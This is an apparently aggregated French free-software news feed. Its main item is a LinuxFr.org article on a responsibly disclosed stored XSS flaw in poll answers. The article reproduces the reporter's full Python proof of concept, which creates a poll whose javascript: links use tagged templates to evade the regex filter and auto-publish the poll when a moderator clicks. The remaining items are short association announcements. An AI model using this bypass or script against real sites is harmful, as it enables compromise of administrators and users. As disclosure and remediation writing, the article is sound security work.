Not affected versions per series:

  • trytond:
    • 8.0: >= 8.0.6
    • 7.8: >= 7.8.12
    • 7.0: >= 7.0.53

Some custom reports may fail after the upgrade because they are using dynamic or private attributes. Such reports must be updated to use only the allowed statements.

Reference

Concerns?

Any security concerns should be reported on the bug-tracker at https://bugs.tryton.org/ with the confidential checkbox checked.

2 posts - 2 participants

Read full topic

LinuxFr

XSS sur le site linuxfr.org (pas très grave à mon avis)


Internet
Publié le
jeudi 02 juillet 2026 23h05
Importé le
vendredi 03 juillet 2026 05h03

Ce titre est celui d’un courriel reçu le samedi 20 juin 2026 en fin de soirée. La France est alors au milieu de sa deuxième canicule de l’année, et moi en train de produire la dépêche De la fermeture des comptes inactifs depuis 3 ans que je pensais initialement en avance et qui était finalement en retard.

Et donc recevoir un tel message n’annonçait rien de bien rafraîchissant. (Même si ça changeait des week-ends successifs d’annonces de failles de sécurité noyau à déployer plus ou moins en urgence)

Pourtant il s’agissait du signalement d’une faille réelle, fait de façon détaillée, claire et pédagogique. Ça change du bruit de fond habituel sur Internet avec son lot de tentatives diverses et variées d’injections chimériques mi-SQL mi-Javascript mi-PHP, et ses fameux audits de sécurité non-sollicités et délicieusement bourrins. Grand merci donc à 0xMitsurugi H pour avoir explicité le problème.

Sommaire

Le signalement

L’explication

(avec l’autorisation de l’auteur «  mon code et le rapport sont open source »)

Bonjour, J’ai lu le code source de linuxfr.org et je me suis intéressé aux sondages. J’ai l’impression que certains échappements HTML ne fonctionnent pas très bien. Il est possible de bypasser la regexp dans les réponses du sondage et injecter du javascript dans les réponses. En soi, ce ne serait pas grave, car un sondage doit être validé par un admin pour que les utilisateurs le voient. L’astuce ici consiste à utiliser une réponse avec du js qui fera valider automatiquement le sondage par un admin, et mettre un second javascript dans une autre réponse destiné aux utilisateurs, une fois le sondage validé, permettant la compromission de tous les utilisateurs qui vont cliquer sur le sondage. Voici le poc en python (inliné dans le mail car google fait des dingueries avec les pièces jointes en python): #!/usr/bin/env python3 r""" PoC — XSS stockee via linkify dans les reponses de sondage linuxfr.org Vecteur : href="javascript:..." active au clic Bypass regex : tagged template ` func`arg` ` au lieu de func('arg') - document.querySelector`.ok_button` au lieu de document.querySelector('.ok_button') - form.submit`` au lieu de form.submit() - alert`msg` au lieu de alert('msg') Aucune parenthese `)` n'apparait dans l'URL markdown, donc la regex \[([^\]]*)\]\(([^)]*)\) ne peut rien manger. Contrainte : 128 caracteres max (PollAnswer) Phase 1 : 64 car. (form.submit pour auto-publication) Phase 2 : 54 car. (alert de preuve) Deroulement : 1. Attaquant cree un sondage avec les payloads XSS 2. Moderateuur visite /moderation/sondages/ID et clique sur [a] 3. La publication se fait sans boite de confirmation 4. Les visiteurs cliquent sur [b] -> alerte JavaScript Usage : python3 poc.py <url> <user_session> <url> : racine du site (ex: http://dlfp.lo) <user_session> : valeur du cookie linuxfr.org_session (compte standard) Exemple : python3 poc.py http://dlfp.lo "user_session_value" Prerequis : pip install requests """ import re import sys from urllib.parse import urljoin, urlparse import requests def e(msg: str, code: int = 1) -> None: print(f"[-] {msg}") sys.exit(code) def s(msg: str) -> None: print(f"[+] {msg}") def info(msg: str) -> None: print(f"[*] {msg}") def banner() -> None: print("=" * 68) print(" PoC — XSS linkify -> Auto-validation + XSS proof") print(" Vecteur : tagged templates dans href (pas de ) necessaire)") print(" Cible : linuxfr.org") print("=" * 68) def make_session(cookie_value: str, target_url: str) -> requests.Session: s = requests.Session() hostname = urlparse(target_url).hostname s.cookies.set("linuxfr.org_session", cookie_value, domain=hostname) return s def create_poll(url: str, session: requests.Session,) -> tuple[str, str]: """ Cree un sondage avec les reponses malveillantes. """ # Réponse 1 : 64 car. — form.submit() via tagged template # document.querySelector`.ok_button` => querySelector('.ok_button') # form.submit`` => form.submit() payload_phase1 = ( "[a]" "(javascript:document.querySelector" "`.ok_button`.form.submit``)" ) # Réponse 2 : 54 car. — alert via tagged template payload_phase2 = ( "[b]" "(javascript:alert" "`smile this is your favorite XSS`)" ) info("Chargement du formulaire de creation...") r = session.get(urljoin(url, "/sondages/nouveau")) csrf = re.search( r'name="authenticity_token" value="([^"]*)"', r.text ) csrf = csrf.group(1) info("Creation du sondage malveillant...") r = session.post(urljoin(url, "/sondages"), data={ "authenticity_token": csrf, "poll[title]": "PoC XSS — tagged template", "poll[wiki_explanations]": ( "Cliquez sur les liens ci-dessous !" ), "poll[cc_licensed]": "1", "poll[answers_attributes][0][answer]": payload_phase1, "poll[answers_attributes][1][answer]": payload_phase2, }) if r.status_code not in (200, 302): e(f"Creation echouee (HTTP {r.status_code})") print("Connectez vous en tant qu'admin et cliquez sur la réponse A") def main(): banner() if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <url> <user_session>") print() print("Exemple :") print(f' {sys.argv[0]} http://dlfp.lo "SESSION_USER"') sys.exit(1) target_url = sys.argv[1].rstrip("/") user_session_val = sys.argv[2] user_session = make_session(user_session_val, target_url) # Creation du sondage malveillant print() info("Creation du sondage avec payloads XSS") create_poll(target_url, user_session) if __name__ == "__main__": main() Et je joins les copies d’écran dans l’ordre :-) C’était sympa à trigger, je ne pensais pas arriver à quelque chose avec l’autovalidation de l’admin pour publier le sondage. Bon, il faut quand même l’interaction d’un admin (d’où le fait que ce n’est pas très grave), j’ai essayé des trucs à base de onmouseover, mais je n’arrive à rien de bien ce soir, il fait trop chaud. Merci de gérer et maintenir le site linuxfr, j’ai appris beaucoup de choses en le lisant, même si je ne suis qu’un simple lecteur :-) Merci de fournir le code source sur github, ça m’a permis de debug en live mes tests. Bonne soirée

Et paf le PoC !

Les cinq images étaient en pièces jointes du signalement.

La démonstration à l’œuvre :

En admin, le nouveau sondage dans la page des sondages :

En admin, cliquer sur un choix autovalide le sondage :

Et sur le sondage publié, un clic d’un compte utilisateur :

Paf la faille :

Un peu de contexte

La faille signalée concerne le type de contenu sondages du site LinuxFr.org : un sondage est une question sur un thème donné ; le lectorat du site LinuxFr.org peut choisir parmi un ensemble de réponses proposées. (aide)

Une personne ayant un compte sur le site peut proposer un sondage (aide). Sa publication nécessite une approbation par l’équipe de modération (aide).

Un sondage est composé d’une partie question en Markdown. Et de (en général) plusieurs réponses dans un format exotique : c’est du texte brut, pas de mises en forme en italique/gras ou autre, sauf que les liens au format Markdown [oh un lien](https://une.adresse.invalid) sont possibles, depuis 2012. Ce code pour gérer du supposé texte brut mais acceptant des hyperliens Markdown, avec une expression rationnelle pour gérer, forcément ça annonçait un hypothétique problème à venir.

« Le cross-site scripting (abrégé XSS) est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, provoquant ainsi des actions sur les navigateurs web visitant la page. » (Wikipedia) : ici on va glisser un sondage malveillant dans la base de données LinuxFr.org, une personne modératrice va aller le lire et déclencher involontairement la publication, qui devient alors visible par tout le monde, et chaque personne qui aller voter sur le sondage va déclencher un comportement non désiré. Bon en pratique, à ce moment là, ladite personne modératrice se rendrait alors compte du problème et dépublierait le sondage en catastrophe. Potentiellement trop tard pour quelques personnes du lectorat avides de sondages.

Une vraie faille

Bon si ça se trouve, la faille ne fonctionne pas, c’est facile de tester et de voir si on reproduit. Bon on reproduit…

En analysant le code et en testant, on voit qu’il y a plusieurs soucis :

  • on peut insérer en base de données des choses que l’on ne voudrait pas y voir ;
  • on peut afficher ce qu’on a trouvé en base en filtrant mal.

Donc on va ajouter un filtrage à la création sur les hyperliens pour ne laisser pas que les protocoles autorisés et que des adresses qui ressemblent à des adresses.

Et on va ajouter un filtrage à l’affichage / conversion en HTML pour n’afficher que des hyperliens, dans les protocoles autorisés et avec une adresse qui ressemble à une adresse.

Évidemment il y a la contrainte de ne pas casser le fonctionnel et les sondages déjà présents en base de données.

Donc on fait plein de tests un peu cracra :

Et on produit un commit de correction (si tout va bien).

On a aussi vérifier le contenu existant de la base, au cas où.

Il ne restait plus qu’à remercier le contributeur et à convenir d’une publication en dépêche. Que voici.

Conclusion

Une contribution par une personne qui a lu le code source, qui a déployé le site qui a écrit un bout de code pour illustrer l’exploitation de la faille de bout-en-bout, qui a littéralement illustré l’exploitation avec cinq images et qui a accompagné le tout d’une explication détaillée et en fournissant le code. Que demander de plus ? Encore merci.

Ah oui il faut une ouverture finale et tenir en haleine le lectorat : cette dépêche n'évoque pas la dernière faille signalée (ni même l'avant-dernière), et on n'est que douze jours après.

Télécharger ce contenu au format EPUB

Commentaires : voir le flux Atom ouvrir dans le navigateur

ILARD

PRENEZ LE TEMPS DE VIVRE LES PROCHAINES VACANCES D’ÉTÉ 2026


Grand Est 🇫🇷
Publié le
jeudi 02 juillet 2026 19h22
Importé le
jeudi 02 juillet 2026 21h03
                      BONNES VACANCES A TOUS    Reprise de nos activités le MARDI 1 SEPTEMBRE  2026  à la MCL: AIDE COLLABORATIVE 
Infini

Luanti, jeu Libre en application pendant le FUC 2026


Bretagne 🇫🇷
Publié le
jeudi 02 juillet 2026 16h10
Importé le
jeudi 02 juillet 2026 21h04

Durant le Forum des Usages Coopératifs à l'IMT de Plouzané (30 juin au 2 juillet 2026), le stand d'Infini proposait l'utilisation de Luanti afin de re-créer virtuellement l'espace du forum. Bénévoles, salariés, visiteuses et visiteurs y ont contribué. Il s'agit d'un travail coopératif.
Une partie des bénévoles d'Infini et les salariés de l'association étaient présents pour échanger avec les autres participant⋅es et le public du forum durant les 3 jours.
Quatre ordinateurs en réseau (…)

- Actualités
MJC Chenôve

Découvrez le film  » Des Dames et des Rois » de la classe UPE2a


Bourgogne-Franche-Comté 🇫🇷
Publié le
jeudi 02 juillet 2026 10h54
Importé le
jeudi 02 juillet 2026 13h04

Découvrez le nouveau film réalisé par la classe UPE2A Lycée Roland Carraz avec les Maisons Pop, dans le cadre des 60 ans de la MJC (1966–2026).   Mardi 30 juin, avait lieu la projection du film réalisé par la classe UPE2A du lycée Roland Carraz et les Maisons Pop, en présence des élèves et partenaires. […]

L’article Découvrez le film  » Des Dames et des Rois » de la classe UPE2a est apparu en premier sur Les Maisons Pop de Chenôve.

CERCLL

Mageia 10 : le manchot sort du chaudron !


Provence-Alpes-Côte d'Azur 🇫🇷
Publié le
jeudi 02 juillet 2026 08h06
Importé le
jeudi 02 juillet 2026 13h03
La nouvelle mouture de la distribution Linux communautaire Mageia est disponible : la version 10 fait sortir le manchot du chaudron ! Les personnes connaissant la distribution comprendront l’allusion 😉   Cauldron — le chaudron — étant la version de développement, il est naturel d’en obtenir une version installable stabilisée périodiquement. À vos téléchargements pour utiliser cette […]